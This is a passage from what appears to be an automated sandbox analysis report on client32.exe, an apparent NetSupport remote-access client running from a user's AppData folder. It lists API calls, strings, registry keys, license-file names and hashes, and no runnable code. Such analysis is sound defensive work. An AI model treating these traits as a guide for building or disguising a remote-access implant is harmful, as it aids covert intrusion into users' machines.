                                                                              • API String ID: 3494822531-1878648853
                                                                              • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                              • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                              APIs
                                                                              • IsJPIK.PCICHEK(AB86ACF8,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: _free_malloc_memsetwsprintf
                                                                              • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                              • API String ID: 2814900446-469156069
                                                                              • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                              • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101792C
                                                                              • CoInitialize.OLE32(00000000), ref: 11017935
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                              • CoUninitialize.OLE32 ref: 110179C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                              • API String ID: 2407233060-578995875
                                                                              • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                              • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017842
                                                                              • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                              • CoUninitialize.OLE32 ref: 110178D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                              • API String ID: 2407233060-2037925671
                                                                              • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                              • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                              APIs
                                                                              Strings
                                                                              • DoICFConfig() OK, xrefs: 111396D6
                                                                              • AutoICFConfig, xrefs: 11139650
                                                                              • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                              • Client, xrefs: 11139655
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: CountTick
                                                                              • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                              • API String ID: 536389180-1512301160
                                                                              • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                              • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                              • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                              • API String ID: 3222248624-258972079
                                                                              • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                              • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                              • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                              • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                              • API String ID: 4186647306-532032230
                                                                              • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                              • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                              • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                              • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                              • API String ID: 2579639479-1136101629
                                                                              • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                              • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s%s.bin$562258$_HF$_HW$_SW
                                                                              • API String ID: 2111968516-3988310630
                                                                              • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                              • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                              • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                              • RegisterClassA.USER32(?), ref: 111036EF
                                                                              • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                              • String ID: NSMDesktopWnd
                                                                              • API String ID: 2669163067-206650970
                                                                              • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                              • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                              • API String ID: 47109696-3245241687
                                                                              • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                              • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                              APIs
                                                                                • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                              • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                              • API String ID: 806825551-1858614750
                                                                              • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                              • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                              APIs
                                                                                • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                              • ResetEvent.KERNEL32(0000026C), ref: 11144E39
                                                                              • SetEvent.KERNEL32(0000026C), ref: 11144E4F
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                              • String ID: MiniDump
                                                                              • API String ID: 1494854734-2840755058
                                                                              • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                              • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                              • wsprintfA.USER32 ref: 11147A16
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                              • API String ID: 1985783259-2296142801
                                                                              • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                              • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                              • API String ID: 3234921582-2664294811
                                                                              • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                              • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                              • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: SetProcessDpiAwareness$shcore.dll
                                                                              • API String ID: 1108920153-1959555903
                                                                              • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                              • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11031FE6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                              • String ID: %s%s.bin$562258$clientinv.cpp$m_pDoInv == NULL
                                                                              • API String ID: 4180936305-24552472
                                                                              • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                              • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                              • __strdup.LIBCMT ref: 11145277
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                              • _free.LIBCMT ref: 111452AC
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                              • String ID:
                                                                              • API String ID: 398584587-0
                                                                              • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                              • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                              APIs
                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                              • _free.LIBCMT ref: 1100EE64
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1100EE77
                                                                              • _free.LIBCMT ref: 1100EE8A
                                                                              • _free.LIBCMT ref: 1100EE9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                              • String ID:
                                                                              • API String ID: 3515823920-0
                                                                              • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                              • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 1114650E
                                                                              • wsprintfA.USER32 ref: 11146524
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateFolderPathwsprintf$ChangeCloseFindModuleNameNotification
                                                                              • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                              • API String ID: 1400454717-2600120591
                                                                              • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                              • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                              • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                              • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                              • CoUninitialize.OLE32 ref: 110F4BE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3550192930-0
                                                                              • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                              • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75BF8400,?), ref: 11143E97
